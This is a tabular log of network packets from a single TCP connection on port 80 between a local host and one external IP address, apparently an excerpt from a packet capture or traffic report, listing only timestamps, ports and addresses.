Dec 7, 2024 13:00:02.293795109 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.293920994 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.293963909 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.294780970 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.294826031 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.294991016 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.295036077 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.295865059 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.295911074 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.296056032 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.296101093 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.296885014 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.296931028 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.297101974 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.297146082 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.297970057 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.298016071 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.298146963 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.298190117 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.298981905 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.299026012 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.299168110 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.299212933 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.300045013 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.300091028 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.300240040 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.300283909 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.301096916 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.301140070 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.301311016 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.301357031 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.302125931 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.302190065 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.302325964 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.302371025 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.303373098 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.303426027 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.303560019 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.303605080 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.304246902 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.304300070 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.304430962 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.304476023 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.305294037 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.305345058 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.305454969 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.305501938 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.306318045 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.306371927 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.306514978 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.306562901 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.307351112 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.307399035 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.307650089 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.307694912 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.308583975 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.308630943 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.308721066 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.308765888 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.309508085 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.309566975 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.309685946 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.309734106 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.310484886 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.310532093 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.310683966 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.310734034 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.311559916 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.311609983 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.311799049 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.311846972 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.312587976 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.312663078 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.312871933 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.312917948 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.313704014 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.313754082 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.313855886 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.313908100 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.314750910 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.314807892 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.314922094 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.314969063 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.315758944 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.315807104 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.315923929 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.315968037 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.316890955 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.316937923 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.317064047 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.317112923 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.317895889 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.317943096 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.318069935 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.318114996 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.318867922 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.318916082 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.319052935 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.319102049 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.319992065 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.320041895 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.320127964 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.320178986 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.321069956 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.321122885 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.321227074 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.321280003 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.322027922 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.322086096 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.322232962 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.322278976 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.323051929 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.323122025 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.323272943 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.323329926 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.324136972 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.324193954 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.324333906 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.324382067 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.325180054 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.325229883 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.325396061 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.325445890 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.326201916 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.326250076 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.326411009 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.326456070 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.327378035 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.327423096 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.327502012 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.327549934 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.328291893 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.328341007 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.328490019 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.328538895 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.329327106 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.329376936 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.329543114 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.329592943 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.330409050 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.330459118 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.330586910 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.330634117 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.331439972 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.331490993 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.331613064 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.331662893 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.332607031 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.332654953 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.332705021 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.332750082 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.333610058 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.333659887 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.333717108 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.333769083 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.334692001 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.334745884 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.334893942 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.334940910 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.335688114 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.335737944 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.335836887 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.335886002 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.336759090 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.336812973 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.474407911 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.474510908 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.474564075 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.474610090 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.474987030 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.475038052 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.475310087 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.475367069 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.477577925 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.477623940 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.477797031 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.477807045 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.477848053 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.478547096 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.478595972 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.479005098 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.479015112 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.479062080 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.479089975 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.479633093 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.479676008 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.480000973 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.480051041 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.480298042 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.480345964 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.480683088 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.480732918 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.481106043 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.481167078 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.481410980 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.481461048 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.482182980 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.482233047 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.482359886 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.482405901 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.483263016 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.483320951 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.483453989 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.483500957 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.484258890 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.484306097 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.484497070 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.484545946 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.485318899 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.485368013 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.485522985 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.485569954 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.486371994 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.486419916 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.486569881 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.486617088 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.487525940 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.487571001 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.487669945 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.487725973 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.488482952 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.488532066 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.488718987 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.488770008 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.489522934 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.489573002 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.489733934 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.489783049 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.490636110 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.490684032 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.490761995 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.490812063 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.491615057 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.491664886 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.491828918 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.491880894 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.492650986 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.492700100 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.492862940 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.492911100 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.493693113 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.493747950 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.493897915 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.493946075 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.494776964 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.494828939 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.494924068 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.494972944 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.495920897 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.495971918 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.496000051 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.496077061 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.496857882 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.496908903 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.497021914 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.497066975 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.497976065 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.498023987 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.498214960 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.498260975 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.498949051 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.498996019 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.499123096 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.499167919 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.499996901 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.500058889 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.500169992 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.500217915 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.501118898 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.501164913 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.501260042 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.501306057 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.502154112 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.502203941 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.502343893 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.502388954 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.503122091 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.503169060 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.503339052 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.503388882 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.504179955 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.504230022 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.504381895 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.504429102 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.505249023 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.505297899 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.505409956 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.505470037 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.506257057 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.506300926 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.506458044 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.506503105 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.507381916 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.507431984 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.507564068 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.507610083 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.508367062 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.508409977 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.508605957 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.508655071 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.509429932 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.509478092 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.509632111 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.509680033 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.510516882 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.510572910 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.510663033 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.510715008 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.511511087 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.511560917 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.511704922 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.511969090 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.512518883 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.512563944 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.512737989 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.512784958 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.513606071 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.513645887 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.513860941 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.513904095 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.514805079 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.514847040 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.514945984 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.514987946 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.515734911 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.515799999 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.515914917 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.515959978 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.517011881 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.517055988 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.517209053 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.517256021 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.518119097 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.518162012 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.518277884 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.518320084 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.519062042 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.519118071 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.519231081 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.519275904 CET	49829	80	192.168.2.7	185.215.113.16
